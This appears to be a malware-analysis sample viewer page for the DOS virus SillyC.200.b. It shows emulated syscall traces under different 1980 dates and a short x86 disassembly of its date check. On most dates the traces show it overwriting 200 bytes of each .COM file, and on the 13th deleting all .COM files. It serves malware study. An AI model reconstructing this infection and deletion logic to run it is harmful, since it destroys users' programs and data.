Sample viewer

vx.netlux.org/Virus.DOS.SillyC.200.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:52:09.73838669Z 26 PC: 12a50 | Set disk transfer address
2018-12-17T22:52:09.740687111Z 42 PC: 12a54 | Get date 0x12a54: cmp al, 0
0x12a56: je 0x12a5d
0x12a58: cmp dl, 0xd
0x12a5b: jne 0x12a76
0x12a5d: lea dx, word ptr [0x1be]
0x12a61: call 0x12ae3
0x12a64: jb 0x12acf
0x12a66: mov dx, di
0x12a68: mov ah, 0x41
0x12a6a: int 0x21
0x12a6c: lea dx, word ptr [0x1be]
0x12a70: mov ah, 0x4f
0x12a72: int 0x21
0x12a74: jae 0x12a66
0x12a76: lea dx, word ptr [0x1c2]
0x12a7a: call 0x12ae3
0x12a7d: jb 0x12acf
0x12a7f: mov dx, di
0x12a81: mov ax, 0x3d02
0x12a84: int 0x21
2018-12-17T22:52:09.743297895Z 78 PC: 12af9 | Find first file
2018-12-17T22:52:09.749997842Z 61 PC: 12a86 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:52:09.757919042Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:52:09.759821265Z 63 PC: 12af9 | Read file or device (Read 200 bytes on handle 5)
2018-12-17T22:52:09.76814925Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:09.769964149Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:09.786126239Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:09.789231152Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:09.797340636Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:52:09.800620357Z 62 PC: 12ac3 | Close file
2018-12-17T22:52:09.810478526Z 79 PC: 12acb | Find next file
2018-12-17T22:52:09.814109206Z 61 PC: 12a86 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:52:09.823075259Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:52:09.825497519Z 63 PC: 12af9 | Read file or device (Read 200 bytes on handle 5)
2018-12-17T22:52:09.833065666Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:09.835941338Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:09.839697895Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:09.843461615Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:09.846766934Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:52:09.848767533Z 62 PC: 12ac3 | Close file
2018-12-17T22:52:09.859132393Z 79 PC: 12acb | Find next file
2018-12-17T22:52:09.862341161Z 61 PC: 12a86 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:52:09.870510246Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:52:09.872047855Z 63 PC: 12af9 | Read file or device (Read 200 bytes on handle 5)
2018-12-17T22:52:09.878991228Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:09.882801957Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:09.886153152Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:09.887916755Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:09.89211422Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:52:09.894086976Z 62 PC: 12ac3 | Close file
2018-12-17T22:52:09.902477738Z 79 PC: 12acb | Find next file
2018-12-17T22:52:09.906478083Z 61 PC: 12a86 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:52:09.914452573Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:52:09.916525988Z 63 PC: 12af9 | Read file or device (Read 200 bytes on handle 5)
2018-12-17T22:52:09.924212056Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:09.927824032Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:09.931547907Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:09.93375844Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:09.938314268Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:52:09.94056163Z 62 PC: 12ac3 | Close file
2018-12-17T22:52:09.949460106Z 79 PC: 12acb | Find next file
2018-12-17T22:52:09.953881531Z 61 PC: 12a86 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:52:09.962548392Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:52:09.964548158Z 63 PC: 12af9 | Read file or device (Read 200 bytes on handle 5)
2018-12-17T22:52:09.975080223Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:09.978286056Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:09.981679901Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:09.984586872Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:09.988048004Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:52:09.989891036Z 62 PC: 12ac3 | Close file
2018-12-17T22:52:09.999759153Z 79 PC: 12acb | Find next file
2018-12-17T22:52:10.003684396Z 61 PC: 12a86 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:52:10.011414307Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:52:10.013577761Z 63 PC: 12af9 | Read file or device (Read 200 bytes on handle 5)
2018-12-17T22:52:10.021899955Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:10.023756022Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:10.033117938Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:10.036136589Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:10.044635464Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:52:10.04639016Z 62 PC: 12ac3 | Close file
2018-12-17T22:52:10.054850733Z 79 PC: 12acb | Find next file
2018-12-17T22:52:10.057711297Z 61 PC: 12a86 | Open file (Filename = 'PAH.COM')
2018-12-17T22:52:10.064602182Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:52:10.066965251Z 63 PC: 12af9 | Read file or device (Read 200 bytes on handle 5)
2018-12-17T22:52:10.07446542Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:10.075931424Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:10.079862098Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:10.081821488Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:10.084805854Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:52:10.086382136Z 62 PC: 12ac3 | Close file
2018-12-17T22:52:10.431732423Z 79 PC: 12acb | Find next file
2018-12-17T22:52:10.435214504Z 61 PC: 12a86 | Open file (Filename = 'TEST.COM')
2018-12-17T22:52:10.443196178Z 87 PC: 12a8f | Get or set file date and time
2018-12-17T22:52:10.445778669Z 63 PC: 12af9 | Read file or device (Read 200 bytes on handle 5)
2018-12-17T22:52:10.448954284Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:10.450814328Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:10.461021623Z 66 PC: 12af9 | Move file pointer
2018-12-17T22:52:10.4635168Z 64 PC: 12af9 | Write file or device (Write 200 bytes on handle 5)
2018-12-17T22:52:10.467143322Z 87 PC: 12abf | Get or set file date and time
2018-12-17T22:52:10.469927102Z 62 PC: 12ac3 | Close file
2018-12-17T22:52:10.479214018Z 79 PC: 12acb | Find next file

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10797,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:18.076336904Z 26 PC: 12a50 | Set disk transfer address
2018-12-25T12:29:18.078300168Z 42 PC: 12a54 | Get date 0x12a54: cmp al, 0
0x12a56: je 0x12a5d
0x12a58: cmp dl, 0xd
0x12a5b: jne 0x12a76
0x12a5d: lea dx, word ptr [0x1be]
0x12a61: call 0x12ae3
0x12a64: jb 0x12acf
0x12a66: mov dx, di
0x12a68: mov ah, 0x41
0x12a6a: int 0x21
0x12a6c: lea dx, word ptr [0x1be]
0x12a70: mov ah, 0x4f
0x12a72: int 0x21
0x12a74: jae 0x12a66
0x12a76: lea dx, word ptr [0x1c2]
0x12a7a: call 0x12ae3
0x12a7d: jb 0x12acf
0x12a7f: mov dx, di
0x12a81: mov ax, 0x3d02
0x12a84: int 0x21
2018-12-25T12:29:18.08080274Z 78 PC: 12af9 | Find first file
2018-12-25T12:29:18.087419087Z 61 PC: 12a86 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:29:18.095897732Z 87 PC: 12a8f | Get or set file date and time
2018-12-25T12:29:18.097533262Z 63 PC: 12af9 | Read file or device (See above)
2018-12-25T12:29:18.128742154Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.138685577Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.155513336Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.157514398Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.166162114Z 87 PC: 12abf | Get or set file date and time
2018-12-25T12:29:18.167977786Z 62 PC: 12ac3 | Close file
2018-12-25T12:29:18.177247293Z 79 PC: 12acb | Find next file
2018-12-25T12:29:18.180487912Z 61 PC: 12a86 | Open file (See above)
2018-12-25T12:29:18.189778987Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T12:29:18.191498205Z 63 PC: 12af9 | Read file or device (See above)
2018-12-25T12:29:18.200401879Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.203483758Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.208324489Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.210590485Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.214977998Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T12:29:18.217105563Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T12:29:18.225748271Z 79 PC: 12acb | Find next file (See above)
2018-12-25T12:29:18.22928041Z 61 PC: 12a86 | Open file (See above)
2018-12-25T12:29:18.23735076Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T12:29:18.239028737Z 63 PC: 12af9 | Read file or device (See above)
2018-12-25T12:29:18.247263277Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.249024519Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.251889694Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.253504583Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.257315447Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T12:29:18.258924157Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T12:29:18.266913647Z 79 PC: 12acb | Find next file (See above)
2018-12-25T12:29:18.270363859Z 61 PC: 12a86 | Open file (See above)
2018-12-25T12:29:18.27798684Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T12:29:18.279364415Z 63 PC: 12af9 | Read file or device (See above)
2018-12-25T12:29:18.287490433Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.288973531Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.291707673Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.293955662Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.296856886Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T12:29:18.298508315Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T12:29:18.307147605Z 79 PC: 12acb | Find next file (See above)
2018-12-25T12:29:18.310037846Z 61 PC: 12a86 | Open file (See above)
2018-12-25T12:29:18.317036077Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T12:29:18.31900663Z 63 PC: 12af9 | Read file or device (See above)
2018-12-25T12:29:18.326366561Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.328318952Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.332707015Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.334612256Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.337665682Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T12:29:18.339400887Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T12:29:18.349138654Z 79 PC: 12acb | Find next file (See above)
2018-12-25T12:29:18.352453146Z 61 PC: 12a86 | Open file (See above)
2018-12-25T12:29:18.360280351Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T12:29:18.363382068Z 63 PC: 12af9 | Read file or device (See above)
2018-12-25T12:29:18.37098708Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.373112691Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.38344092Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.384824745Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.389467922Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T12:29:18.391711722Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T12:29:18.400735138Z 79 PC: 12acb | Find next file (See above)
2018-12-25T12:29:18.403758148Z 61 PC: 12a86 | Open file (See above)
2018-12-25T12:29:18.411384241Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T12:29:18.413284522Z 63 PC: 12af9 | Read file or device (See above)
2018-12-25T12:29:18.420733453Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.422373234Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.425360748Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.426848933Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.429823834Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T12:29:18.432828249Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T12:29:18.441231826Z 79 PC: 12acb | Find next file (See above)
2018-12-25T12:29:18.444469737Z 61 PC: 12a86 | Open file (See above)
2018-12-25T12:29:18.453181577Z 87 PC: 12a8f | Get or set file date and time (See above)
2018-12-25T12:29:18.455096402Z 63 PC: 12af9 | Read file or device (See above)
2018-12-25T12:29:18.458298612Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.461012563Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.470334563Z 66 PC: 12af9 | Move file pointer (See above)
2018-12-25T12:29:18.471906812Z 64 PC: 12af9 | Write file or device (See above)
2018-12-25T12:29:18.480563727Z 87 PC: 12abf | Get or set file date and time (See above)
2018-12-25T12:29:18.482469693Z 62 PC: 12ac3 | Close file (See above)
2018-12-25T12:29:18.492114521Z 79 PC: 12acb | Find next file (See above)

{"DateBased":true,"Day":6,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10797,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:18.331590885Z 26 PC: 12a50 | Set disk transfer address
2018-12-25T12:29:18.333776832Z 42 PC: 12a54 | Get date 0x12a54: cmp al, 0
0x12a56: je 0x12a5d
0x12a58: cmp dl, 0xd
0x12a5b: jne 0x12a76
0x12a5d: lea dx, word ptr [0x1be]
0x12a61: call 0x12ae3
0x12a64: jb 0x12acf
0x12a66: mov dx, di
0x12a68: mov ah, 0x41
0x12a6a: int 0x21
0x12a6c: lea dx, word ptr [0x1be]
0x12a70: mov ah, 0x4f
0x12a72: int 0x21
0x12a74: jae 0x12a66
0x12a76: lea dx, word ptr [0x1c2]
0x12a7a: call 0x12ae3
0x12a7d: jb 0x12acf
0x12a7f: mov dx, di
0x12a81: mov ax, 0x3d02
0x12a84: int 0x21
2018-12-25T12:29:18.336207991Z 78 PC: 12af9 | Find first file
2018-12-25T12:29:18.342259932Z 65 PC: 12a6c | Delete file (Filename = 'SLEEP.COM')
2018-12-25T12:29:18.37378252Z 79 PC: 12a74 | Find next file
2018-12-25T12:29:18.376710207Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.387661744Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.391106987Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.402305384Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.404780945Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.415663566Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.419756037Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.430481368Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.434938053Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.453734638Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.456529008Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.467169306Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.470293894Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.481974367Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.484967698Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.497470452Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.500038031Z 78 PC: 12af9 | Find first file (See above)

{"DateBased":true,"Day":13,"Month":2,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10797,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:29:18.518359963Z 26 PC: 12a50 | Set disk transfer address
2018-12-25T12:29:18.520388982Z 42 PC: 12a54 | Get date 0x12a54: cmp al, 0
0x12a56: je 0x12a5d
0x12a58: cmp dl, 0xd
0x12a5b: jne 0x12a76
0x12a5d: lea dx, word ptr [0x1be]
0x12a61: call 0x12ae3
0x12a64: jb 0x12acf
0x12a66: mov dx, di
0x12a68: mov ah, 0x41
0x12a6a: int 0x21
0x12a6c: lea dx, word ptr [0x1be]
0x12a70: mov ah, 0x4f
0x12a72: int 0x21
0x12a74: jae 0x12a66
0x12a76: lea dx, word ptr [0x1c2]
0x12a7a: call 0x12ae3
0x12a7d: jb 0x12acf
0x12a7f: mov dx, di
0x12a81: mov ax, 0x3d02
0x12a84: int 0x21
2018-12-25T12:29:18.52233399Z 78 PC: 12af9 | Find first file
2018-12-25T12:29:18.528404949Z 65 PC: 12a6c | Delete file (Filename = 'SLEEP.COM')
2018-12-25T12:29:18.545544582Z 79 PC: 12a74 | Find next file
2018-12-25T12:29:18.548035811Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.56036852Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.562627147Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.569925744Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.572361771Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.583001591Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.585445028Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.596082171Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.598913606Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.609840924Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.612242257Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.623266148Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.6272839Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.638481677Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.641275765Z 65 PC: 12a6c | Delete file (See above)
2018-12-25T12:29:18.658903396Z 79 PC: 12a74 | Find next file (See above)
2018-12-25T12:29:18.661285403Z 78 PC: 12af9 | Find first file (See above)